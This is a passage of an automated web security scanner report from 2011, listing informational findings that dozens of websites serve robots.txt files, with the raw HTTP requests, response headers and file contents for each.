Disallow: /attachment.php
Disallow: /calendar.php
Disallow: /converse.php
Disallow: /cron.php
Disallow: /editpost.php
Disallow: /global.php
Disa
...[SNIP]...
30.178. http://www.firstload.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstload.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firstload.de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:52 GMT
Server: Apache
Last-Modified: Tue, 28 Sep 2010 12:35:12 GMT
ETag: "88542-43-49151137a4000"
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
#Disallow: /member/
#Disallow: /affiliate/

30.179. http://www.firstpeople.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstpeople.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firstpeople.us

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:16:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 22 Aug 2009 22:59:57 GMT
ETag: "14006d-61-471c2f18d3540"
Accept-Ranges: bytes
Content-Length: 97
Connection: close
Content-Type: text/plain

# robots.txt generated at http://www.firstpeople.us
User-agent: *
Disallow:
Disallow: /cgi-bin/
30.180. http://www.flushotsusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flushotsusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flushotsusa.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Feb 2010 20:26:50 GMT
ETag: "35082de-a7-47eb809c79680"
Accept-Ranges: bytes
Content-Length: 167
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: http://www.flushotsusa.com/overview/C160/
Disallow: http://www.flushotsusa.com/category/C161/
Disallow: http://www.flushotsusa.com/detail/C161/
30.181. http://www.foot-pain-explained.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foot-pain-explained.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foot-pain-explained.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:01:22 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.foot-pain-explained.com/KBms0mcj.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /
...[SNIP]...
30.182. http://www.forrabbits.eu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forrabbits.eu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.forrabbits.eu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:41:46 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 07:04:45 GMT
ETag: "3105a-88-490bfa4d05eba"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php
30.183. http://www.fredflare.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredflare.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fredflare.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:52 GMT
Server: Apache
Last-Modified: Tue, 31 Mar 2009 21:29:19 GMT
Accept-Ranges: bytes
Content-Length: 42
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /diary/kdiary.php
30.184. http://www.freegamesnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freegamesnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freegamesnews.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:01 GMT
Server: Apache
Last-Modified: Fri, 01 Jun 2007 12:37:31 GMT
ETag: "3a-431d77a9298c0"
Accept-Ranges: bytes
Content-Length: 58
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Mon, 02 May 2011 01:44:01 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /fr/?feed=
Disallow: /en/?feed=

30.185. http://www.freei.me/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freei.me
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freei.me

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:38:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://freei.me/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 24
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from sv38.byethost38.org
Via: 1.0 sv38.byethost38.org:80 (squid/2.7.STABLE9)
Connection: close

User-agent: *
Disallow:
30.186. http://www.freemooviesonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemooviesonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freemooviesonline.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
Last-Modified: Sat, 26 Jun 2010 18:05:12 GMT
ETag: "248001a-326-489f2ba910600"
Accept-Ranges: bytes
Content-Length: 806
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /m
...[SNIP]...
30.187. http://www.ftjcfx.com/image-4989411-10867633  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftjcfx.com
Path:   /image-4989411-10867633

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftjcfx.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Mon, 25 Apr 2011 22:28:50 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Mon, 02 May 2011 02:19:28 GMT

# go away
User-agent: *
Disallow: /
30.188. http://www.fulltiltpoker.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulltiltpoker.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fulltiltpoker.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:46 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /?
Disallow: /download.php?aff=
Disallow: /download.php?key=
Disallow: /bonusMacBeta.php?aff
Disallow: /bonusMacBeta.php?key

User-agent: Slurp
Disallow: /?key=
Disallo
...[SNIP]...
30.189. http://www.gaf.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gaf.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gaf.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 04 Oct 2010 18:14:00 GMT
Accept-Ranges: bytes
ETag: "024eeeaef63cb1:0"
Server: Microsoft-IIS/7.5
Content-Length: 301
Date: Sun, 01 May 2011 23:10:14 GMT
Connection: close

# robots.txt for http://www.gaf.com

User-Agent: *
Disallow: /App_Code
Disallow: /Bin
Disallow: /CCZ-HomePage
Disallow: /Controls
Disallow: /CustomErrors
Disallow: /homedepot
Disallow: /MasterPages
Di
...[SNIP]...
30.190. http://www.garden.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.garden.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.garden.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:32:41 GMT
Server: Apache/1.3.32 (Unix) PHP/5.0.3 mod_ssl/2.8.21 OpenSSL/0.9.7d
Last-Modified: Tue, 18 May 2010 14:04:22 GMT
ETag: "24385e-38-4bf29e66"
Accept-Ranges: bytes
Content-Length: 56
Content-Type: text/plain;charset=utf-8
Connection: close

User-agent: *
Disallow: info.php
Disallow: redirect.php
30.191. http://www.gastongazette.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gastongazette.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gastongazette.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:21 GMT
Server: Apache
Cache-Control: max-age=86400
Last-Modified: Sun, 01 May 2011 20:05:54 GMT
Expires: Mon, 02 May 2011 20:05:54 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 928
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /common/bc/
Disallow: /common/bc3/
Disallow: /common/gabriels/
Disallow: /common/gsa/
Disallow: /common/printer/
Disallow: /common/pluck/
Disallow: /common/tools/
Disallow: /co
...[SNIP]...
30.192. http://www.gearfuse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gearfuse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gearfuse.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:19:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Pingback: http://www.gearfuse.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Vary: User-Agent,Accept-Encoding
Content-Length: 73
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.gearfuse.com/sitemap.xml.gz
30.193. http://www.giantblackhooters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giantblackhooters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.giantblackhooters.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:01 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://giantblackhooters.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://giantblackhooters.com/sitemap.xml.gz
30.194. http://www.girlscoutshop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.girlscoutshop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.girlscoutshop.com

Response

HTTP/1.1 200 OK
Content-Length: 94
Content-Type: text/plain
Last-Modified: Thu, 27 Jan 2011 23:17:19 GMT
Accept-Ranges: bytes
ETag: "dee0195878becb1:33ac"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:12:19 GMT
Connection: close
Set-Cookie: Tagalongs=d6OlH7K5vjkg1aaNvdrCAAyuQhFbkWMawXqQARTea2ncgYe50lgkvgvlLdjyxGhS5XLGxvCt6iw81w==; path=/

User-agent: *
Disallow:
Sitemap: http://www.girlscoutshop.com/gsusaonline/sitemapindex.xml
30.195. http://www.globelifeapplication.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.globelifeapplication.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.globelifeapplication.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:49 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: Apache=173.193.214.243.1304293489161145; path=/; expires=Mon, 27-Apr-26 23:44:49 GMT
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Content-Length: 88
Connection: close
Content-Type: text/html

# /robots.txt file for http://www.globelifeapplication.com/

User-agent: *
Disallow: /
30.196. http://www.gocrimson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gocrimson.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gocrimson.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:13 GMT
Server: Resin/3.0.18
ETag: "FHA+QzSmsjB"
Last-Modified: Wed, 09 Jun 2010 19:14:17 GMT
Content-Type: text/plain
Content-Length: 445
Connection: close

# Managed by PrestoSports sysadmin@prestosports.com
User-agent: american-univ-crawler (Enterprise; S5-DWRRJ5KWB2NAA; nguyen@american.edu)
Disallow: /

User-agent: CSTV Search Crawler
Disallow: /

User
...[SNIP]...
30.197. http://www.gohawaii.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gohawaii.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gohawaii.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=XKQRVMS192.168.10.48CKMLW; path=/
Date: Sun, 01 May 2011 23:51:23 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 28 Apr 2011 18:54:59 GMT
ETag: "67c-4a1ff180bc6c0"
Accept-Ranges: bytes
Content-Length: 1660
Cache-Control: max-age=604800
Expires: Sun, 08 May 2011 23:51:23 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /directory/search
Disallow: /big-island/search
Disallow: /statewide/search
Disallow: /oahu/search
Disallow: /lanai/search
Disallow: /maui/search
Disallow: /molokai/searc
...[SNIP]...
30.198. http://www.goldpassport.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goldpassport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goldpassport.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 08 Dec 2010 09:13:08 GMT
Content-Type: text/plain; charset=ISO-8859-1
Expires: Mon, 02 May 2011 00:44:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 00:44:00 GMT
Content-Length: 7258
Connection: close
Set-Cookie: NSC_xxx.izbuu.dpn_80=9fd41b483660;expires=Mon, 02-May-11 01:14:00 GMT;path=/

User-agent: *
Disallow: /cet/
Disallow: /hyatt/reservations/
Disallow: /hyatt/pure/locator/
Disallow: /*?NE
Disallow: /hyatt/features/hotel-search-results.jsp
Disallow: /hyatt/search/specials/re
...[SNIP]...
30.199. http://www.goodtoknow.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goodtoknow.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goodtoknow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Apr 2011 08:28:48 GMT
ETag: "601aa6-24a-4a0dcb6dc9000"
Accept-Ranges: bytes
Content-Length: 586
Content-Type: text/plain
Date: Mon, 02 May 2011 00:18:21 GMT
Connection: close
Set-Cookie: browsertype=web; expires=Tue, 03-May-2011 00:18:21 GMT; path=/; domain=.goodtoknow.co.uk

# robots.txt file for goodtoknow.co.uk

Sitemap: http://www.goodtoknow.co.uk/sitemaps/sitemap-index.xml

User-agent: *
Disallow: /bookmark
Disallow: /articles/sendToFriend/
Disallow: /privacy
Disallow
...[SNIP]...
30.200. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 02 May 2011 01:53:18 GMT
Expires: Mon, 02 May 2011 01:53:18 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
30.201. http://www.gov-auctions.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gov-auctions.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gov-auctions.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 10 Aug 2008 16:03:00 GMT
ETag: "2041a001-23-4541d2c3fb500"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain


User-agent: *
Disallow: /cgi-bin/
30.202. http://www.grannarium.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grannarium.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.grannarium.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:51 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_ssl/2.8.31 OpenSSL/0.9.8c
Last-Modified: Sun, 18 Jul 2010 06:53:27 GMT
ETag: "32b4059-68-4c42a4e7"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /porn/
Disallow: /image/
Disallow: /style/
Disallow: /crtr/
30.203. http://www.greenbuildingadvisor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenbuildingadvisor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenbuildingadvisor.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:30 GMT
Server: Apache
Last-Modified: Sat, 17 Jan 2009 17:21:52 GMT
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:20:30 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.204. http://www.greensmoke.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greensmoke.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greensmoke.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:01 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 09:23:27 GMT
ETag: "17b0003-96-49875014901c0"
Accept-Ranges: bytes
Content-Length: 150
Cache-Control: max-age=315360000
Expires: Wed, 28 Apr 2021 23:14:01 GMT
P3P: CP="CURi CONi OUR IND PUR NAV DSP ALL COR"
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /livehelp/
Disallow: /support/
Disallow: /support2/
Disallow: /discuss/
Disallow: /test/
Disallow: /services/
Disallow: /earn/
30.205. http://www.guitarnoise.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarnoise.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guitarnoise.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Last-Modified: Sat, 16 Jan 2010 00:54:06 GMT
ETag: "5e0010-14e-47d3d8e9d6780"
Accept-Ranges: bytes
Content-Length: 334
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /forums/viewtopic.php?p=
Disallow: /forums/viewtopic.php?=&p=
Disallow: /forums/viewtopic.php?t=
Disallow: /forums/viewtopic.php?start=
Disallow: /forums/*&view=previous

...[SNIP]...
30.206. http://www.gwawa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gwawa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gwawa.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 22 Apr 2011 07:37:35 GMT
Accept-Ranges: bytes
ETag: "dd62e625c00cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:58:27 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /

30.207. http://www.hairyfilm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairyfilm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hairyfilm.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 01 May 2011 23:45:13 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 22 Jul 2010 19:11:40 GMT
ETag: "28f10-5d-4c4897ec"
Accept-Ranges: bytes
Content-Length: 93

User-agent: *
Disallow: /?x=
Allow: /movies/
Sitemap: http://www.hairyfilm.com/sitemap.xml
30.208. http://www.hairysupreme.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairysupreme.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hairysupreme.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:37 GMT
Server: Apache
Last-Modified: Sun, 13 Dec 2009 22:11:13 GMT
ETag: "e9a17d-18-4b256681"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

30.209. http://www.halfpriceozarks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.halfpriceozarks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.halfpriceozarks.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:07 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 25 Aug 2010 15:52:30 GMT
ETag: "14600d7-6f-48ea7de790b80"
Accept-Ranges: bytes
Content-Length: 111
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /discuss
Disallow: /email
Disallow: /inc
Disallow: /sms
Disallow: side-deal2.php
30.210. http://www.hannaandersson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hannaandersson.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hannaandersson.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 17 Aug 2010 19:06:32 GMT
Accept-Ranges: bytes
ETag: "78a9ef4d3f3ecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:34 GMT
Connection: keep-alive
Content-Length: 279

User-agent: *
Disallow: /App_Code
Disallow: /Bin
Disallow: /Config
Disallow: /coremetrics
Disallow: /foresee
Disallow: /html
Disallow: /HtmlEmails
Disallow: /images
Disallow: /include
Disall
...[SNIP]...
30.211. http://www.harlandclarke.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harlandclarke.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.harlandclarke.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 20:29:19 GMT
Accept-Ranges: bytes
Content-Length: 281
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt - standard configuration
User-agent: *
Disallow: /about/people/
Disallow: /solutions/partnersite
Disallow: /solutions/partner-site
Disallow: /admin/
Disallow: /files/
Disallow: /_images/

...[SNIP]...
30.212. http://www.hauteliving.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hauteliving.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hauteliving.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 26 Apr 2010 21:01:43 GMT
ETag: "e080ff-1c2-4852a1584fbc0"
Accept-Ranges: bytes
Content-Length: 450
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /z/
Disallow: /stats/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /contact/
Disallow: /category/
Disallow: /tag/
Disallow: /wp-content/plugins/
D
...[SNIP]...
30.213. http://www.headsets.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.headsets.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.headsets.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 208
Connection: close
Content-Type: text/html; charset=ISO-8859-1

User-agent: Googlebot
Disallow: /cgi/
Disallow: /cart/
Disallow: /acc_mgt/
Disallow: /manage/
Disallow: /*?
Disallow: /?

User-agent: *
Disallow: /cgi/
Disallow: /cart/
Disallow: /acc_mgt/
Disallow: /
...[SNIP]...
30.214. http://www.healthination.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthination.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthination.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 01 May 2011 23:56:04 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Tue, 08 Mar 2011 15:16:56 GMT
Content-Length: 357
Cache-Control: max-age=4200
Expires: Mon, 02 May 2011 01:06:04 GMT
Accept-Ranges: bytes

User-agent: *
Crawl-delay: 30
Disallow: /Girl-Talk/Girl-Talk/
Disallow: /Girl-Talk/Girl-Talk
Disallow: /Partner-With-Us/Part
Disallow: /Partner-With-Us/Internet-Partners
Disallow: /demos/
Disal
...[SNIP]...
30.215. http://www.healthykids.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthykids.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthykids.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:46 GMT
Server: Apache/2.2.2 (FreeBSD) mod_ssl/2.2.2 OpenSSL/0.9.8b
Last-Modified: Tue, 04 Jul 2006 19:05:03 GMT
ETag: "472d2e-43-312f75c0"
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: text/plain

User-agent:    *
Disallow:    /cgi-bin
Disallow:    /stats
Disallow:    /admin
30.216. http://www.heartlandconnection.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heartlandconnection.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heartlandconnection.com

Response

HTTP/1.0 200 OK
Content-Length: 595
Content-Type: text/plain
Content-Location: http://www.heartlandconnection.com/robots.txt
Last-Modified: Wed, 10 Dec 2008 17:34:43 GMT
Accept-Ranges: bytes
ETag: "431e6b96ed5ac91:1190"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 02 May 2011 00:51:08 GMT
Connection: close

User-agent: *
Disallow: /cms/
User-agent: *
Disallow: /includes/
User-agent: *
